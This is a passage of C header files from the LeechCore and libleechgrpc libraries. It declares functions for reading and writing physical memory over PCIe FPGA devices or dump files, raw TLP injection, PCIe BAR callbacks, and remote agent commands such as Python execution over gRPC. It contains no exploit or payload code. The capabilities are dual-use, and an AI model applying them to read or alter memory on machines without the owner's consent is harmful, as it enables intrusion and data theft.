// For more information please consult the LeechCore information on Github:
// - README: https://github.com/ufrisk/LeechCore
// - GUIDE: https://github.com/ufrisk/LeechCore/wiki
//
// (c) Ulf Frisk, 2020-2026
// Author: Ulf Frisk, pcileech@frizk.net
//
// Header Version: 2.20.0
//
#ifndef __LEECHCORE_H__
#define __LEECHCORE_H__
#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
//-----------------------------------------------------------------------------
// OS COMPATIBILITY BELOW:
//-----------------------------------------------------------------------------
#ifdef _WIN32
#include <Windows.h>
#define EXPORTED_FUNCTION __declspec(dllexport)
typedef unsigned __int64 QWORD, *PQWORD;
#endif /* _WIN32 */
#if defined(LINUX) || defined(MACOS)
#include <inttypes.h>
#include <stdlib.h>
#define EXPORTED_FUNCTION __attribute__((visibility("default")))
typedef void VOID, *PVOID, *HANDLE, **PHANDLE, *HMODULE;
typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PULONG64;
typedef size_t SIZE_T, *PSIZE_T;
typedef uint64_t FILETIME, *PFILETIME;
typedef uint32_t DWORD, *PDWORD, *LPDWORD, BOOL, *PBOOL, NTSTATUS;
typedef uint16_t WORD, *PWORD;
typedef uint8_t BYTE, *PBYTE, *LPBYTE, UCHAR;
typedef char CHAR, *PCHAR, *LPSTR;
typedef const char *LPCSTR;
typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;
typedef const uint16_t *LPCWSTR;
#define MAX_PATH 260
#define _In_
#define _In_z_
#define _In_opt_
#define _In_reads_(x)
#define _In_reads_bytes_(x)
#define _In_reads_bytes_opt_(x)
#define _In_reads_opt_(x)
#define _Inout_
#define _Inout_bytecount_(x)
#define _Inout_opt_
#define _Inout_updates_opt_(x)
#define _Out_
#define _Out_opt_
#define _Out_writes_(x)
#define _Out_writes_bytes_opt_(x)
#define _Out_writes_opt_(x)
#define _Out_writes_to_(x,y)
#define _When_(x,y)
#define _Frees_ptr_opt_
#define _Post_ptr_invalid_
#define _Check_return_opt_
#define _Printf_format_string_
#define _Success_(x)
#endif /* LINUX || MACOS */
//-----------------------------------------------------------------------------
// Create and Close LeechCore devices:
// It's possible to create multiple LeechCore devices in parallel and also of
// different types if the underlying device will allow this. LeechCore will
// automatically take care of and abstract away any hardware/software issues
// with regards to the underlying devices.
//
// For more information about supported devices please check out the LeechCore
// guide at: https://github.com/ufrisk/LeechCore/wiki
//-----------------------------------------------------------------------------
#define LC_CONFIG_VERSION 0xc0fd0002
#define LC_CONFIG_ERRORINFO_VERSION 0xc0fe0002
#define LC_CONFIG_PRINTF_ENABLED 0x01
#define LC_CONFIG_PRINTF_V 0x02
#define LC_CONFIG_PRINTF_VV 0x04
#define LC_CONFIG_PRINTF_VVV 0x08
typedef struct LC_CONFIG {
// below are set by caller
DWORD dwVersion; // must equal LC_CREATE_VERSION
DWORD dwPrintfVerbosity; // printf verbosity according to LC_PRINTF_*
CHAR szDevice[MAX_PATH]; // device configuration - see wiki for additional info.
CHAR szRemote[MAX_PATH]; // remote configuration - see wiki for additional info.
_Check_return_opt_ int(*pfn_printf_opt)(_In_z_ _Printf_format_string_ char const *const _Format, ...);
// below are set by caller, updated by LeecCore
QWORD paMax; // max physical address (disables any max address auto-detect).
// below are set by LeechCore
BOOL fVolatile;
BOOL fWritable;
BOOL fRemote;
BOOL fRemoteDisableCompress;
CHAR szDeviceName[MAX_PATH]; // device name - such as 'fpga' or 'file'.
} LC_CONFIG, *PLC_CONFIG;
typedef struct tdLC_CONFIG_ERRORINFO {
DWORD dwVersion; // must equal LC_CONFIG_ERRORINFO_VERSION
DWORD cbStruct;
DWORD _FutureUse[16];
BOOL fUserInputRequest;
DWORD cwszUserText;
WCHAR wszUserText[];
} LC_CONFIG_ERRORINFO, *PLC_CONFIG_ERRORINFO, **PPLC_CONFIG_ERRORINFO;
/*
* Create a new LeechCore device according to the supplied configuration.
* CALLER LcMemFree: ppLcCreateErrorInfo
* -- pLcCreateConfig
* -- ppLcCreateErrorInfo = ptr to receive function allocated struct with error
* information upon function failure. This info may contain a user message
* requesting user action as an example. Any returned struct should be
* free'd by a call to LcMemFree().
* -- return
*/
EXPORTED_FUNCTION _Success_(return != NULL)
HANDLE LcCreate(
_Inout_ PLC_CONFIG pLcCreateConfig
);
EXPORTED_FUNCTION _Success_(return != NULL)
HANDLE LcCreateEx(
_Inout_ PLC_CONFIG pLcCreateConfig,
_Out_opt_ PPLC_CONFIG_ERRORINFO ppLcCreateErrorInfo
);
/*
* Close a LeechCore handle and free any resources no longer needed.
*/
EXPORTED_FUNCTION
VOID LcClose(
_In_opt_ _Post_ptr_invalid_ HANDLE hLC
);
//-----------------------------------------------------------------------------
// Read and Write memory from underlying device either using contiguous method
// or more recommended scatter method.
//
// The MEM_SCATTER struct allows reading and writing of discontiguous memory
// chunks which must adhere to the following rules:
// - maximum size = 0x1000 (4096) bytes = recommended size.
// - minimum size = 2 DWORDs (8 bytes).
// - must be DWORD (4 byte) aligned.
// - must never cross 0x1000 page boundary.
// - max value of iStack = MEM_SCATTER_STACK_SIZE - 2.
//-----------------------------------------------------------------------------
#define MEM_SCATTER_VERSION 0xc0fe0002
#define MEM_SCATTER_STACK_SIZE 12
typedef struct tdMEM_SCATTER {
DWORD version; // MEM_SCATTER_VERSION
BOOL f; // TRUE = success data in pb, FALSE = fail or not yet read.
QWORD qwA; // address of memory to read
union {
PBYTE pb; // buffer to hold memory contents
QWORD _Filler;
};
DWORD cb; // size of buffer to hold memory contents.
DWORD iStack; // internal stack pointer
QWORD vStack[MEM_SCATTER_STACK_SIZE]; // internal stack
} MEM_SCATTER, *PMEM_SCATTER, **PPMEM_SCATTER;
#define MEM_SCATTER_ADDR_INVALID ((QWORD)-1)
#define MEM_SCATTER_ADDR_ISINVALID(pMEM) (pMEM->qwA == (QWORD)-1)
#define MEM_SCATTER_ADDR_ISVALID(pMEM) (pMEM->qwA != (QWORD)-1)
#define MEM_SCATTER_STACK_PUSH(pMEM, v) (pMEM->vStack[pMEM->iStack++] = (QWORD)(v))
#define MEM_SCATTER_STACK_PEEK(pMEM, i) (pMEM->vStack[pMEM->iStack - i])
#define MEM_SCATTER_STACK_SET(pMEM, i, v) (pMEM->vStack[pMEM->iStack - i] = (QWORD)(v))
#define MEM_SCATTER_STACK_ADD(pMEM, i, v) (pMEM->vStack[pMEM->iStack - i] += (QWORD)(v))
#define MEM_SCATTER_STACK_POP(pMEM) (pMEM->vStack[--pMEM->iStack])
/*
* Free LeechCore allocated memory such as memory allocated by the
* LcAllocScatter / LcCommand functions.
* -- pv
*/
EXPORTED_FUNCTION
VOID LcMemFree(
_Frees_ptr_opt_ PVOID pv
);
/*
* Allocate and pre-initialize empty MEMs including a 0x1000 buffer for each
* pMEM. The result should be freed by LcFree when its no longer needed.
* The 0x1000-sized per-MEM memory buffers are contigious between MEMs in order.
* -- cMEMs
* -- pppMEMs = pointer to receive ppMEMs
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcAllocScatter1(
_In_ DWORD cMEMs,
_Out_ PPMEM_SCATTER *pppMEMs
);
/*
* Allocate and pre-initialize empty MEMs excluding the 0x1000 buffer which
* will be accounted towards the pbData buffer in a contiguous way.
* The result should be freed by LcFree when its no longer needed.
* -- cbData = size of pbData (must be cMEMs * 0x1000)
* -- pbData = buffer used for MEM.pb
* -- cMEMs
* -- pppMEMs = pointer to receive ppMEMs
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcAllocScatter2(
_In_ DWORD cbData,
_Inout_updates_opt_(cbData) PBYTE pbData,
_In_ DWORD cMEMs,
_Out_ PPMEM_SCATTER *pppMEMs
);
/*
* Allocate and pre-initialize empty MEMs excluding the 0x1000 buffer which
* will be accounted towards the pbData buffer in a contiguous way.
* -- pbDataFirstPage = optional buffer of first page
* -- pbDataLastPage = optional buffer of last page
* -- cbData = size of pbData
* -- pbData = buffer used for MEM.pb except first/last if exists
* -- cMEMs
* -- pppMEMs = pointer to receive ppMEMs
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcAllocScatter3(
_Inout_updates_opt_(0x1000) PBYTE pbDataFirstPage,
_Inout_updates_opt_(0x1000) PBYTE pbDataLastPage,
_In_ DWORD cbData,
_Inout_updates_opt_(cbData) PBYTE pbData,
_In_ DWORD cMEMs,
_Out_ PPMEM_SCATTER *pppMEMs
);
/*
* Read memory in a scattered non-contiguous way. This is recommended for reads.
* -- hLC
* -- cMEMs
* -- ppMEMs
*/
EXPORTED_FUNCTION
VOID LcReadScatter(
_In_ HANDLE hLC,
_In_ DWORD cMEMs,
_Inout_ PPMEM_SCATTER ppMEMs
);
/*
* Read memory in a contiguous way. Note that if multiple memory segments are
* to be read LcReadScatter() may be more efficient.
* -- hLC,
* -- pa
* -- cb
* -- pb
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcRead(
_In_ HANDLE hLC,
_In_ QWORD pa,
_In_ DWORD cb,
_Out_writes_(cb) PBYTE pb
);
/*
* Write memory in a scattered non-contiguous way.
* -- hLC
* -- cMEMs
* -- ppMEMs
*/
EXPORTED_FUNCTION
VOID LcWriteScatter(
_In_ HANDLE hLC,
_In_ DWORD cMEMs,
_Inout_ PPMEM_SCATTER ppMEMs
);
/*
* Write memory in a contiguous way.
* -- hLC
* -- pa
* -- cb
* -- pb
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcWrite(
_In_ HANDLE hLC,
_In_ QWORD pa,
_In_ DWORD cb,
_In_reads_(cb) PBYTE pb
);
//-----------------------------------------------------------------------------
// Get/Set/Command functionality may be used to query and/or update LeechCore
// or its devices in various ways.
//-----------------------------------------------------------------------------
/*
* Set an option as defined by LC_OPT_*. (R option).
* -- hLC
* -- fOption = LC_OPT_*
* -- cbData
* -- pbData
* -- pcbData
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcGetOption(
_In_ HANDLE hLC,
_In_ QWORD fOption,
_Out_ PQWORD pqwValue
);
/*
* Get an option as defined by LC_OPT_*. (W option).
* -- hLC
* -- fOption = LC_OPT_*
* -- cbData
* -- pbData
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcSetOption(
_In_ HANDLE hLC,
_In_ QWORD fOption,
_In_ QWORD qwValue
);
/*
* Execute a command and retrieve a result (if any) at the same time.
* NB! If *ppbDataOut contains a memory allocation on exit this should be free'd
* by calling LcMemFree().
* CALLER LcFreeMem: *ppbDataOut
* -- hLC
* -- fCommand = LC_CMD_*
* -- cbDataIn
* -- pbDataIn
* -- ppbDataOut
* -- pcbDataOut
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcCommand(
_In_ HANDLE hLC,
_In_ QWORD fCommand,
_In_ DWORD cbDataIn,
_In_reads_opt_(cbDataIn) PBYTE pbDataIn,
_Out_opt_ PBYTE *ppbDataOut,
_Out_opt_ PDWORD pcbDataOut
);
#define LC_OPT_CORE_PRINTF_ENABLE 0x4000000100000000 // RW
#define LC_OPT_CORE_VERBOSE 0x4000000200000000 // RW
#define LC_OPT_CORE_VERBOSE_EXTRA 0x4000000300000000 // RW
#define LC_OPT_CORE_VERBOSE_EXTRA_TLP 0x4000000400000000 // RW
#define LC_OPT_CORE_VERSION_MAJOR 0x4000000500000000 // R
#define LC_OPT_CORE_VERSION_MINOR 0x4000000600000000 // R
#define LC_OPT_CORE_VERSION_REVISION 0x4000000700000000 // R
#define LC_OPT_CORE_ADDR_MAX 0x1000000800000000 // R
#define LC_OPT_CORE_STATISTICS_CALL_COUNT 0x4000000900000000 // R [lo-dword: LC_STATISTICS_ID_*]
#define LC_OPT_CORE_STATISTICS_CALL_TIME 0x4000000a00000000 // R [lo-dword: LC_STATISTICS_ID_*]
#define LC_OPT_CORE_VOLATILE 0x1000000b00000000 // R
#define LC_OPT_CORE_READONLY 0x1000000c00000000 // R
#define LC_OPT_MEMORYINFO_VALID 0x0200000100000000 // R
#define LC_OPT_MEMORYINFO_FLAG_32BIT 0x0200000300000000 // R
#define LC_OPT_MEMORYINFO_FLAG_PAE 0x0200000400000000 // R
#define LC_OPT_MEMORYINFO_ARCH 0x0200001200000000 // R - LC_ARCH_TP
#define LC_OPT_MEMORYINFO_OS_VERSION_MINOR 0x0200000500000000 // R
#define LC_OPT_MEMORYINFO_OS_VERSION_MAJOR 0x0200000600000000 // R
#define LC_OPT_MEMORYINFO_OS_DTB 0x0200000700000000 // R
#define LC_OPT_MEMORYINFO_OS_PFN 0x0200000800000000 // R
#define LC_OPT_MEMORYINFO_OS_PsLoadedModuleList 0x0200000900000000 // R
#define LC_OPT_MEMORYINFO_OS_PsActiveProcessHead 0x0200000a00000000 // R
#define LC_OPT_MEMORYINFO_OS_MACHINE_IMAGE_TP 0x0200000b00000000 // R
#define LC_OPT_MEMORYINFO_OS_NUM_PROCESSORS 0x0200000c00000000 // R
#define LC_OPT_MEMORYINFO_OS_SYSTEMTIME 0x0200000d00000000 // R
#define LC_OPT_MEMORYINFO_OS_UPTIME 0x0200000e00000000 // R
#define LC_OPT_MEMORYINFO_OS_KERNELBASE 0x0200000f00000000 // R
#define LC_OPT_MEMORYINFO_OS_KERNELHINT 0x0200001000000000 // R
#define LC_OPT_MEMORYINFO_OS_KdDebuggerDataBlock 0x0200001100000000 // R
#define LC_OPT_FPGA_PROBE_MAXPAGES 0x0300000100000000 // RW
#define LC_OPT_FPGA_MAX_SIZE_RX 0x0300000300000000 // RW
#define LC_OPT_FPGA_MAX_SIZE_TX 0x0300000400000000 // RW
#define LC_OPT_FPGA_DELAY_PROBE_READ 0x0300000500000000 // RW - uS
#define LC_OPT_FPGA_DELAY_PROBE_WRITE 0x0300000600000000 // RW - uS
#define LC_OPT_FPGA_DELAY_WRITE 0x0300000700000000 // RW - uS
#define LC_OPT_FPGA_DELAY_READ 0x0300000800000000 // RW - uS
#define LC_OPT_FPGA_RETRY_ON_ERROR 0x0300000900000000 // RW
#define LC_OPT_FPGA_DEVICE_ID 0x0300008000000000 // RW - bus:dev:fn (ex: 04:00.0 == 0x0400).
#define LC_OPT_FPGA_FPGA_ID 0x0300008100000000 // R
#define LC_OPT_FPGA_VERSION_MAJOR 0x0300008200000000 // R
#define LC_OPT_FPGA_VERSION_MINOR 0x0300008300000000 // R
#define LC_OPT_FPGA_ALGO_TINY 0x0300008400000000 // RW - 1/0 use tiny 128-byte/tlp read algorithm.
#define LC_OPT_FPGA_ALGO_SYNCHRONOUS 0x0300008500000000 // RW - 1/0 use synchronous (old) read algorithm.
#define LC_OPT_FPGA_CFGSPACE_XILINX 0x0300008600000000 // RW - [lo-dword: register address in bytes] [bytes: 0-3: data, 4-7: byte_enable(if wr/set); top bit = cfg_mgmt_wr_rw1c_as_rw]
#define LC_OPT_FPGA_TLP_READ_CB_WITHINFO 0x0300009000000000 // RW - 1/0 call TLP read callback with additional string info in szInfo
#define LC_OPT_FPGA_TLP_READ_CB_FILTERCPL 0x0300009100000000 // RW - 1/0 call TLP read callback with memory read completions from read calls filtered
#define LC_CMD_FPGA_PCIECFGSPACE 0x0000010300000000 // R
#define LC_CMD_FPGA_CFGREGPCIE 0x0000010400000000 // RW - [lo-dword: register address]
#define LC_CMD_FPGA_CFGREGCFG 0x0000010500000000 // RW - [lo-dword: register address]
#define LC_CMD_FPGA_CFGREGDRP 0x0000010600000000 // RW - [lo-dword: register address]
#define LC_CMD_FPGA_CFGREGCFG_MARKWR 0x0000010700000000 // W - write with mask [lo-dword: register address] [bytes: 0-1: data, 2-3: mask]
#define LC_CMD_FPGA_CFGREGPCIE_MARKWR 0x0000010800000000 // W - write with mask [lo-dword: register address] [bytes: 0-1: data, 2-3: mask]
#define LC_CMD_FPGA_CFGREG_DEBUGPRINT 0x0000010a00000000 // N/A
#define LC_CMD_FPGA_PROBE 0x0000010b00000000 // RW
#define LC_CMD_FPGA_CFGSPACE_SHADOW_RD 0x0000010c00000000 // R
#define LC_CMD_FPGA_CFGSPACE_SHADOW_WR 0x0000010d00000000 // W - [lo-dword: config space write base address]
#define LC_CMD_FPGA_TLP_WRITE_SINGLE 0x0000011000000000 // W - write single tlp BYTE:s
#define LC_CMD_FPGA_TLP_WRITE_MULTIPLE 0x0000011100000000 // W - write multiple LC_TLP:s
#define LC_CMD_FPGA_TLP_TOSTRING 0x0000011200000000 // RW - convert single TLP to LPSTR; *pcbDataOut includes NULL terminator.
#define LC_CMD_FPGA_TLP_CONTEXT 0x2000011400000000 // W - set/unset TLP user-defined context to be passed to callback function. (pbDataIn == LPVOID user context). [not remote].
#define LC_CMD_FPGA_TLP_CONTEXT_RD 0x2000011b00000000 // R - get TLP user-defined context to be passed to callback function. [not remote].
#define LC_CMD_FPGA_TLP_FUNCTION_CALLBACK 0x2000011500000000 // W - set/unset TLP callback function (pbDataIn == PLC_TLP_CALLBACK). [not remote].
#define LC_CMD_FPGA_TLP_FUNCTION_CALLBACK_RD 0x2000011c00000000 // R - get TLP callback function. [not remote].
#define LC_CMD_FPGA_BAR_CONTEXT 0x2000012000000000 // W - set/unset BAR user-defined context to be passed to callback function. (pbDataIn == LPVOID user context). [not remote].
#define LC_CMD_FPGA_BAR_CONTEXT_RD 0x2000012100000000 // R - get BAR user-defined context to be passed to callback function. [not remote].
#define LC_CMD_FPGA_BAR_FUNCTION_CALLBACK 0x2000012200000000 // W - set/unset BAR callback function (pbDataIn == PLC_BAR_CALLBACK). [not remote].
#define LC_CMD_FPGA_BAR_FUNCTION_CALLBACK_RD 0x2000012300000000 // R - get BAR callback function. [not remote].
#define LC_CMD_FPGA_BAR_INFO 0x0000012400000000 // R - get BAR info (pbDataOut == LC_BAR_INFO[6]).
#define LC_CMD_FILE_DUMPHEADER_GET 0x0000020100000000 // R
#define LC_CMD_STATISTICS_GET 0x4000010000000000 // R
#define LC_CMD_MEMMAP_GET 0x4000020000000000 // R - MEMMAP as LPSTR
#define LC_CMD_MEMMAP_SET 0x4000030000000000 // W - MEMMAP as LPSTR
#define LC_CMD_MEMMAP_GET_STRUCT 0x4000040000000000 // R - MEMMAP as LC_MEMMAP_ENTRY[]
#define LC_CMD_MEMMAP_SET_STRUCT 0x4000050000000000 // W - MEMMAP as LC_MEMMAP_ENTRY[]
#define LC_CMD_AGENT_EXEC_PYTHON 0x8000000100000000 // RW - [lo-dword: optional timeout in ms]
#define LC_CMD_AGENT_EXIT_PROCESS 0x8000000200000000 // - [lo-dword: process exit code]
#define LC_CMD_AGENT_VFS_LIST 0x8000000300000000 // RW
#define LC_CMD_AGENT_VFS_READ 0x8000000400000000 // RW
#define LC_CMD_AGENT_VFS_WRITE 0x8000000500000000 // RW
#define LC_CMD_AGENT_VFS_OPT_GET 0x8000000600000000 // RW
#define LC_CMD_AGENT_VFS_OPT_SET 0x8000000700000000 // RW
#define LC_CMD_AGENT_VFS_INITIALIZE 0x8000000800000000 // RW
#define LC_CMD_AGENT_VFS_CONSOLE 0x8000000900000000 // RW
#define LC_CMD_AGENT_VFS_REQ_VERSION 0xfeed0001
#define LC_CMD_AGENT_VFS_RSP_VERSION 0xfeee0001
#define LC_STATISTICS_VERSION 0xe1a10002
#define LC_STATISTICS_ID_OPEN 0x00
#define LC_STATISTICS_ID_READ 0x01
#define LC_STATISTICS_ID_READSCATTER 0x02
#define LC_STATISTICS_ID_WRITE 0x03
#define LC_STATISTICS_ID_WRITESCATTER 0x04
#define LC_STATISTICS_ID_GETOPTION 0x05
#define LC_STATISTICS_ID_SETOPTION 0x06
#define LC_STATISTICS_ID_COMMAND 0x07
#define LC_STATISTICS_ID_MAX 0x07
typedef struct tdLC_CMD_AGENT_VFS_REQ {
DWORD dwVersion;
DWORD _FutureUse;
CHAR uszPathFile[2*MAX_PATH]; // file path to list/read/write
union {
QWORD qwOffset; // offset to read/write
QWORD fOption; // option to get/set (qword data in *pb)
};
DWORD dwLength; // length to read
DWORD cb;
BYTE pb[0];
} LC_CMD_AGENT_VFS_REQ, *PLC_CMD_AGENT_VFS_REQ;
typedef struct tdLC_CMD_AGENT_VFS_RSP {
DWORD dwVersion;
DWORD dwStatus; // ntstatus of read/write
DWORD cbReadWrite; // number of bytes read/written
DWORD _FutureUse[2];
DWORD cb;
BYTE pb[0];
} LC_CMD_AGENT_VFS_RSP, *PLC_CMD_AGENT_VFS_RSP;
static LPCSTR LC_STATISTICS_NAME[] = {
"LcOpen",
"LcRead",
"LcReadScatter",
"LcWrite",
"LcWriteScatter",
"LcGetOption",
"LcSetOption",
"LcCommand",
};
typedef struct tdLC_STATISTICS {
DWORD dwVersion;
DWORD _Reserved;
QWORD qwFreq;
struct {
QWORD c;
QWORD tm; // total time in qwFreq ticks
} Call[LC_STATISTICS_ID_MAX + 1];
} LC_STATISTICS, *PLC_STATISTICS;
typedef struct tdLC_MEMMAP_ENTRY {
QWORD pa;
QWORD cb;
QWORD paRemap;
} LC_MEMMAP_ENTRY, *PLC_MEMMAP_ENTRY;
typedef enum tdLC_ARCH_TP {
LC_ARCH_NA = 0,
LC_ARCH_X86 = 1,
LC_ARCH_X86PAE = 2,
LC_ARCH_X64 = 3,
LC_ARCH_ARM64 = 4,
} LC_ARCH_TP;
//-----------------------------------------------------------------------------
// RAW TLP READ/WRITE SUPPORT:
//-----------------------------------------------------------------------------
/*
* TLP structure to be used with LC_CMD_FPGA_TLP_WRITE_MULTIPLE.
*/
typedef struct tdLC_TLP {
DWORD cb;
DWORD _Reserved1;
PBYTE pb;
} LC_TLP, *PLC_TLP;
/*
* Custom FPGA callback function called when a TLP is received.
* Callback function set by command LC_CMD_FPGA_TLP_FUNCTION_CALLBACK.
* User-defined context is set by command: LC_CMD_FPGA_TLP_CONTEXT.
*/
typedef VOID(*PLC_TLP_FUNCTION_CALLBACK)(
_In_opt_ PVOID ctx,
_In_ DWORD cbTlp,
_In_ PBYTE pbTlp,
_In_opt_ DWORD cbInfo,
_In_opt_ LPSTR szInfo
);
#define LC_TLP_FUNCTION_CALLBACK_DISABLE (PLC_TLP_FUNCTION_CALLBACK)(NULL)
#define LC_TLP_FUNCTION_CALLBACK_DUMMY (PLC_TLP_FUNCTION_CALLBACK)(-1)
//-----------------------------------------------------------------------------
// VMM (VM) LOOPBACK SUPPORT:
// Functionality is used to create a VMM loopback device which is used by VMM
// to read and write memory to/from a virtual machine. See VMM for an example.
// Struct is passed in the 'hlcvmm' parameter to LcCreate() and will be copied.
//-----------------------------------------------------------------------------
#define LC_VMM_VERSION 0x1eef0001
typedef struct tdLC_VMM {
DWORD dwVersion;
HANDLE hVMM;
HANDLE hVMMVM;
PVOID pfnVMMDLL_ConfigGet;
PVOID pfnVMMDLL_VmMemReadScatter;
PVOID pfnVMMDLL_VmMemWriteScatter;
} LC_VMM, *PLC_VMM;
//-----------------------------------------------------------------------------
// PCIE BAR SUPPORT:
//-----------------------------------------------------------------------------
typedef struct tdLC_BAR {
BOOL fValid;
BOOL fIO;
BOOL f64Bit;
BOOL fPrefetchable;
DWORD _Filler[3];
DWORD iBar;
QWORD pa;
QWORD cb;
} LC_BAR, *PLC_BAR;
typedef struct tdLC_BAR_REQUEST {
PVOID ctx; // user context (set by command LC_CMD_FPGA_BAR_CONTEXT)
PLC_BAR pBar; // BAR info
BYTE bTag; // TLP tag (0-255)
BYTE bFirstBE; // First byte enable (0-3) [relevant for writes]
BYTE bLastBE; // Last byte enable (0-3) [relevant for writes]
BYTE _Filler;
BOOL f64; // 64-bit bar access (false = 32-bit)
BOOL fRead; // BAR read request, called function should update pbData with read data and set fReadReply = TRUE on success.
BOOL fReadReply; // Read success - should be updated by called function upon read success (after updating pbData).
BOOL fWrite; // BAR write request (no reply should be sent, check byte-enables bFirstBE/bLastBE)
DWORD cbData; // number of bytes to read/write
QWORD oData; // data offset in BAR.
BYTE pbData[4096]; // bytes to write or read data (to be updated by called function).
} LC_BAR_REQUEST, *PLC_BAR_REQUEST;
/*
* Custom FPGA callback function to be called when BAR read/write is received.
* Callback function set by command LC_CMD_FPGA_BAR_FUNCTION_CALLBACK.
* User-defined context is set by command: LC_CMD_FPGA_BAR_CONTEXT.
* Read reply is sent by updating pbData with read data and fReadReply = TRUE.
* To return Unsupported Request (UR) set fReadReply = FALSE on a MRd request.
*/
typedef VOID(*PLC_BAR_FUNCTION_CALLBACK)(_Inout_ PLC_BAR_REQUEST pBarRequest);
#define LC_BAR_FUNCTION_CALLBACK_DISABLE (PLC_BAR_FUNCTION_CALLBACK)(NULL)
#define LC_BAR_FUNCTION_CALLBACK_ZEROBAR (PLC_BAR_FUNCTION_CALLBACK)(-1)
#ifdef __cplusplus
}
#endif /* __cplusplus */
#endif /* __LEECHCORE_H__ */
================================================
FILE: includes/leechgrpc.h
================================================
// leechgrpc.h : external header of the libleechgrpc library.
//
// libleechgrpc is a library used by LeechCore to communicate with a LeechAgent
// gRPC server. The library provides functions to create a gRPC client and
// server, submit commands to the server, and handle incoming commands.
//
// libleechgrpc offers a platform-independent way to communicate with remote
// LeechAgent instances, using gRPC as the underlying communication protocol.
// The library supports both insecure and secure connections, with secure
// connections using mTLS.
//
// For more information visit the project page at:
// https://github.com/ufrisk/libleechgrpc
//
// (c) Ulf Frisk, 2025
// Author: Ulf Frisk, pcileech@frizk.net
//
#ifndef __LEECHGRPC_H__
#define __LEECHGRPC_H__
#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
#define LEECHGRPC_MESSAGE_SIZE_MAX (64*1024*1024)
#define LEECHGRPC_CLIENT_TIMEOUT_MS (5000)
#ifdef _WIN32
#include <Windows.h>
#define LEECHGRPC_EXPORTED_FUNCTION __declspec(dllexport)
#endif /* _WIN32 */
#if defined(LINUX) || defined(MACOS)
#include <inttypes.h>
#include <stdlib.h>
#define LEECHGRPC_EXPORTED_FUNCTION __attribute__((visibility("default")))
typedef void VOID, *PVOID, *HANDLE;
typedef size_t SIZE_T;
typedef uint32_t DWORD, BOOL;
typedef uint8_t BYTE, *PBYTE;
typedef char CHAR, *LPSTR;
typedef const char *LPCSTR;
#define _Success_(x)
#define _In_
#define _Out_
#define _In_opt_
#endif /* LINUX || MACOS */
typedef void *LEECHGRPC_CLIENT_HANDLE, *LEECHGRPC_SERVER_HANDLE;
//-----------------------------------------------------------------------------
// LeechgRPC Client API:
//-----------------------------------------------------------------------------
/*
* Submit a command to the gRPC server.
* -- hGRPC: Handle to the gRPC client.
* -- pbIn: Pointer to the input buffer.
* -- cbIn: Size of the input buffer.
* -- ppbOut: Pointer to receive the output buffer. The caller is responsible for freeing this buffer with LocalFree/free.
* -- pcbOut: Pointer to receive the size of the output buffer.
* -- return: TRUE if the command was successfully submitted; otherwise, FALSE.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return)
BOOL leechgrpc_client_submit_command(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC,
_In_ PBYTE pbIn,
_In_ SIZE_T cbIn,
_Out_ PBYTE *ppbOut,
_Out_ SIZE_T *pcbOut
);
typedef BOOL(*pfn_leechgrpc_client_submit_command)(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC,
_In_ PBYTE pbIn,
_In_ SIZE_T cbIn,
_Out_ PBYTE *ppbOut,
_Out_ SIZE_T *pcbOut
);
/*
* Free the gRPC client connection.
* -- hGRPC: Handle to the gRPC client.
*/
LEECHGRPC_EXPORTED_FUNCTION
VOID leechgrpc_client_free(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC
);
typedef VOID(*pfn_leechgrpc_client_free)(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC
);
/*
* Create an insecure unauthenticated unencrypted gRPC client connection to the gRPC server.
* -- pszAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- return: Handle to the gRPC client connection, or NULL on failure.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_insecure(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort
);
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_insecure)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort
);
/*
* Create a gRPC client connection to the gRPC server with mTLS.
* -- pszAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- szTlsServerHostnameOverride: Optional hostname to verify against the server certificate (if different from address).
* -- szTlsServerCertPath: Server CA certificate to trust for mTLS connections.
* -- szTlsClientP12Path: Path to the client's TLS certificate (incl. chain) & private key (.p12 / .pfx).
* -- szTlsClientP12Password: Password for the client's TLS certificate & private key (.p12 / .pfx).
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_secure_p12(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientP12Path,
_In_ LPCSTR szTlsClientP12Password
);
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_secure_p12)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientP12Path,
_In_ LPCSTR szTlsClientP12Password
);
/*
* Create a gRPC client connection to the gRPC server with mTLS.
* -- pszAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- szTlsServerHostnameOverride: Optional hostname to verify against the server certificate (if different from address).
* -- szTlsServerCert: Server CA certificate to trust for mTLS connections.
* -- szTlsClientCert: Cerver TLS certificate.
* -- szTlsClientCertPrivateKey: Client TLS certificate private key.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_secure_pemraw(
_In_ LPCSTR szAddress,
